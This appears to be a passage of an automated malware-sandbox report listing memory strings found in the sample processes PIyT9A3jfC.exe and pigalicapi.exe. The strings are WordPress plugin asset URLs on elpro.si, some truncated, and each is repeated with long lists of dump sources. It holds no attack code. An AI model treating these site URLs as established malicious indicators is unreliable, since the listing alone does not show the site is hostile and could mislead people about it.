                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/mimetypes-link-icons/css/style.php?cssvars=bXRsaV9oZWlnaHQ9MT
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/mimetypes-link-icons/js/mtli-str-replace.min.js?ver=3.1.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/perfect-woocommerce-brands/build/frontend/css/style.css?ver=3
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/perfect-woocommerce-brands/build/frontend/js/index.js?ver=2c7
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sassy-social-share/public/../images/close.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sassy-social-share/public/../images/logo.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sassy-social-share/public/css/sassy-social-share-public.css?v
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sassy-social-share/public/js/sassy-social-share-public.js?ver
                  Source: PIyT9A3jfC.exe, 00000001.00000003.652259211.000000000143F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepr
                  Source: PIyT9A3jfC.exe, 00000001.00000003.807475792.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702274857.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687770203.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepreY
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepress-multilingual-cms/dist/css/blocks/styles.css?ver=4.6
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepress-multilingual-cms/res/flags/en.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.807475792.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702274857.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687770203.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepress-multilingual-cms/res/flags/sl.pn
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepress-multilingual-cms/res/flags/sl.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepress-multilingual-cms/res/js/cookies/language-cookie.js?
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepress-multilingual-cms/templates/language-switchers/menu-
